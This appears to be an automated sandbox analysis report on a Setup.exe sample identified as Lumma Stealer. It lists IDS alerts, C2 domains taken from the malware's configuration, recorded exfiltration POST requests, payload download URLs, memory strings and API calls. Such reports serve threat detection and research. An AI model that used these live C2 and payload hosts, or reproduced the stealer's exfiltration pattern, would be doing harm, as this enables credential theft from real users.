Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49731 -> 104.21.58.45:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49731 -> 104.21.58.45:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49739 -> 104.21.58.45:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49743 -> 104.21.58.45:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: curverpluch.lat
Source: Malware configuration extractor	URLs: talkynicer.lat
Source: Malware configuration extractor	URLs: slipperyloo.lat
Source: Malware configuration extractor	URLs: tentabatte.lat
Source: Malware configuration extractor	URLs: bashfulacid.lat
Source: Malware configuration extractor	URLs: manyrestro.lat
Source: Malware configuration extractor	URLs: moanungsnake.click
Source: Malware configuration extractor	URLs: shapestickyr.lat
Source: Malware configuration extractor	URLs: wordyfindy.lat

Source: Joe Sandbox View

IP Address: 104.21.84.113 104.21.84.113

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49730 -> 104.21.58.45:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49743 -> 104.21.58.45:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49736 -> 104.21.58.45:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49739 -> 104.21.58.45:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 104.21.58.45:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49734 -> 104.21.58.45:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49742 -> 104.21.58.45:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49732 -> 104.21.58.45:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49745 -> 104.21.84.113:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49744 -> 104.21.27.229:443

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: moanungsnake.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 77Host: moanungsnake.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=D34RTGIMUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18101Host: moanungsnake.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=28EV8RW5W6V2FNHLUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8770Host: moanungsnake.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=BSHXW675YV8UUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20399Host: moanungsnake.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=4T7B0C22ADZX6GUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1217Host: moanungsnake.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=PLKUFZZIHCUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1066Host: moanungsnake.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 112Host: moanungsnake.click
Source: global traffic	HTTP traffic detected: GET /sdgjyut/psh.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: neqi.shop
Source: global traffic	HTTP traffic detected: GET /int_clp_ldr_sha.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: kliptizq.shop

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /sdgjyut/psh.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: neqi.shop
Source: global traffic	HTTP traffic detected: GET /int_clp_ldr_sha.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: kliptizq.shop

Source: global traffic	DNS traffic detected: DNS query: moanungsnake.click
Source: global traffic	DNS traffic detected: DNS query: neqi.shop
Source: global traffic	DNS traffic detected: DNS query: kliptizq.shop

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: moanungsnake.click

Source: global traffic

HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 23 Dec 2024 23:43:39 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y1lWkEFCWSI09o21y9oD48gwVIeB8U1x4T1BEbFUnWgvQfjtTtUgr1x3Db%2BwRhz0QYKJgm57SYKuYKeJmA7xNdNRbQeI1DF6%2Fbme%2FXAx998uitCL5Sg8%2BlUX0vMn3W4i"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f6c370e5b60c43b-EWR

Source: Setup.exe, 00000000.00000003.1862026466.0000000003BEA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: Setup.exe, 00000000.00000003.1862026466.0000000003BEA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: Setup.exe	String found in binary or memory: http://cert.ssl.com/SSL.com-timeStamping-I-RSA-R1.cer0Q
Source: Setup.exe	String found in binary or memory: http://cert.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.cer0_
Source: Setup.exe, 00000000.00000003.1862026466.0000000003BEA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: Setup.exe, 00000000.00000003.1862026466.0000000003BEA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: Setup.exe, 00000000.00000003.1862026466.0000000003BEA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: Setup.exe, 00000000.00000003.1862026466.0000000003BEA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: Setup.exe	String found in binary or memory: http://crls.ssl.com/SSL.com-timeStamping-I-RSA-R1.crl0
Source: Setup.exe	String found in binary or memory: http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl0
Source: Setup.exe	String found in binary or memory: http://crls.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.crl0
Source: Setup.exe	String found in binary or memory: http://crls.ssl.com/ssl.com-rsa-RootCA.crl0
Source: Setup.exe, 00000000.00000003.1862026466.0000000003BEA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: powershell.exe, 00000004.00000002.2033691829.0000000005426000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://go.micros
Source: powershell.exe, 00000004.00000002.2043272348.0000000006335000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: Setup.exe, 00000000.00000003.1862026466.0000000003BEA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: Setup.exe, 00000000.00000003.1862026466.0000000003BEA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: Setup.exe	String found in binary or memory: http://ocsps.ssl.com0
Source: Setup.exe	String found in binary or memory: http://ocsps.ssl.com0?
Source: powershell.exe, 00000004.00000002.2033691829.0000000005426000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000004.00000002.2033691829.0000000005426000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000004.00000002.2033691829.00000000052D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000004.00000002.2033691829.0000000005426000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000004.00000002.2033691829.0000000005426000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: Setup.exe	String found in binary or memory: http://www.indyproject.org/
Source: powershell.exe, 00000004.00000002.2052362937.0000000008AC2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.
Source: Setup.exe	String found in binary or memory: http://www.ssl.com/repository/SSLcom-RootCA-EV-RSA-4096-R2.crt0
Source: Setup.exe	String found in binary or memory: http://www.ssl.com/repository/SSLcomRootCertificationAuthorityRSA.crt0
Source: Setup.exe, 00000000.00000003.1862026466.0000000003BEA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: Setup.exe, 00000000.00000003.1862026466.0000000003BEA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: Setup.exe, 00000000.00000003.1816177740.0000000003BFA000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1815860817.0000000003BFB000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1816011341.0000000003BF9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000004.00000002.2033691829.00000000052D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000004.00000002.2033691829.0000000005426000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: Setup.exe, 00000000.00000003.1816177740.0000000003BFA000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1815860817.0000000003BFB000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1816011341.0000000003BF9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Setup.exe, 00000000.00000003.1816177740.0000000003BFA000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1815860817.0000000003BFB000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1816011341.0000000003BF9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Setup.exe, 00000000.00000003.1816177740.0000000003BFA000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1815860817.0000000003BFB000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1816011341.0000000003BF9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: powershell.exe, 00000004.00000002.2043272348.0000000006335000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000004.00000002.2043272348.0000000006335000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000004.00000002.2043272348.0000000006335000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: Setup.exe, 00000000.00000003.1815860817.0000000003BFB000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1816011341.0000000003BF9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Setup.exe, 00000000.00000003.1815860817.0000000003BFB000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1816011341.0000000003BF9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Setup.exe, 00000000.00000003.1815860817.0000000003BFB000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1816011341.0000000003BF9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: powershell.exe, 00000004.00000002.2033691829.0000000005426000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: Setup.exe, 00000000.00000003.2629810484.0000000000E05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://kliptizq.shop/
Source: Setup.exe, 00000000.00000003.2629810484.0000000000E5B000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4129521916.0000000000E59000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2629810484.0000000000E7E000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2629810484.0000000000E05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://kliptizq.shop/int_clp_ldr_sha.txt
Source: Setup.exe, 00000000.00000003.2629810484.0000000000E05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://kliptizq.shop/int_clp_ldr_sha.txt8
Source: Setup.exe, 00000000.00000003.2629810484.0000000000E05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://kliptizq.shop/int_clp_ldr_sha.txtG3
Source: Setup.exe, 00000000.00000002.4132372330.000000000341B000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://kliptizq.shop/int_clp_ldr_sha.txtKit/537.36
Source: Setup.exe, 00000000.00000003.1963740587.0000000000E59000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://moanungsnake.click/
Source: Setup.exe, 00000000.00000003.2629810484.0000000000E64000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1963740587.0000000000E59000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://moanungsnake.click/6251
Source: Setup.exe, 00000000.00000003.1963531213.0000000000E87000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://moanungsnake.click/api
Source: Setup.exe, 00000000.00000003.2629810484.0000000000E7E000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1940166955.0000000000E70000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4129927056.0000000000E7E000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1963531213.0000000000E71000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1891443494.0000000000E70000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1916297501.0000000000E7E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://moanungsnake.click/apiJ
Source: Setup.exe, 00000000.00000002.4130135606.0000000000E8D000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2629810484.0000000000E7E000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1963531213.0000000000E87000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://moanungsnake.click/apie.c
Source: Setup.exe, 00000000.00000002.4130135606.0000000000E8D000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2629810484.0000000000E7E000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1940166955.0000000000E8D000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1963531213.0000000000E87000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1916297501.0000000000E8D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://moanungsnake.click/apie.cN
Source: Setup.exe, 00000000.00000003.1940166955.0000000000E87000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://moanungsnake.click:443/apimoanungsnake.clickmoanungsnake.click:
Source: Setup.exe, 00000000.00000002.4130135606.0000000000E8D000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2629810484.0000000000E7E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://neqi.shop/
Source: Setup.exe, 00000000.00000003.2629810484.0000000000E7E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://neqi.shop/sdgjyut/psh.txt
Source: powershell.exe, 00000004.00000002.2043272348.0000000006335000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: Setup.exe, 00000000.00000003.1816559634.0000000003C55000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.microsof
Source: Setup.exe, 00000000.00000003.1863102935.0000000003CD4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: Setup.exe, 00000000.00000003.1863102935.0000000003CD4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: Setup.exe, 00000000.00000003.1816730650.0000000003C07000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1838854499.0000000003C07000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1839390863.0000000003C07000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1816559634.0000000003C53000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: Setup.exe, 00000000.00000003.1816730650.0000000003BE2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: Setup.exe, 00000000.00000003.1816730650.0000000003C07000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1838854499.0000000003C07000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1839390863.0000000003C07000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1816559634.0000000003C53000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: Setup.exe, 00000000.00000003.1816730650.0000000003BE2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: Setup.exe, Setup.exe, 00000000.00000003.2629810484.0000000000E7E000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2629486651.0000000003BCE000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2629810484.0000000000E44000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: Setup.exe, Setup.exe, 00000000.00000002.4129927056.0000000000E7B000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2629810484.0000000000E7E000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2629810484.0000000000E73000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2629486651.0000000003BCE000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2629810484.0000000000E44000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
Source: Setup.exe, 00000000.00000003.1816177740.0000000003BFA000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1815860817.0000000003BFB000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1816011341.0000000003BF9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: Setup.exe, 00000000.00000003.1816177740.0000000003BFA000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1815860817.0000000003BFB000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1816011341.0000000003BF9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: Setup.exe, 00000000.00000003.1863102935.0000000003CD4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: Setup.exe, 00000000.00000003.1863102935.0000000003CD4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: Setup.exe, 00000000.00000003.1863102935.0000000003CD4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: Setup.exe, 00000000.00000003.1863102935.0000000003CD4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: Setup.exe, 00000000.00000003.1863102935.0000000003CD4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: Setup.exe	String found in binary or memory: https://www.neptuneutilities.com/resource.html
Source: Setup.exe	String found in binary or memory: https://www.ssl.com/repository0
Source: Setup.exe	String found in binary or memory: https://www.wisecleaner.net/wisenews/index.php?to=get_news&date=%s

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 104.21.58.45:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.58.45:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.58.45:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.58.45:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.58.45:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.58.45:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.58.45:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.58.45:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.27.229:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.84.113:443 -> 192.168.2.4:49745 version: TLS 1.2

Source: C:\Users\user\Desktop\Setup.exe

Code function: 0_2_03201070 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

0_2_03201070

Source: C:\Users\user\Desktop\Setup.exe

Code function: 0_2_03201070 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

0_2_03201070

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000000.00000002.4130165684.0000000000F80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown

Source: C:\Users\user\Desktop\Setup.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\Setup.exe

Code function: 0_2_00FCBF6F NtCreateSection,NtMapViewOfSection,VirtualAlloc,NtMapViewOfSection,VirtualProtect,VirtualProtect,VirtualProtect,CreateThread,

0_2_00FCBF6F

Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00F803AF	0_2_00F803AF
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00FCBF6F	0_2_00FCBF6F
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00F870FC	0_2_00F870FC
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00FB504D	0_2_00FB504D
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00FBA02C	0_2_00FBA02C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00F80000	0_2_00F80000
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00F841EC	0_2_00F841EC
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00F9D1D2	0_2_00F9D1D2
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00F991A7	0_2_00F991A7
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00F9F16C	0_2_00F9F16C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00F8C12C	0_2_00F8C12C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00F8510C	0_2_00F8510C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00FBE2EC	0_2_00FBE2EC
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00FA9257	0_2_00FA9257
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00FB721C	0_2_00FB721C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00FAD4E0	0_2_00FAD4E0
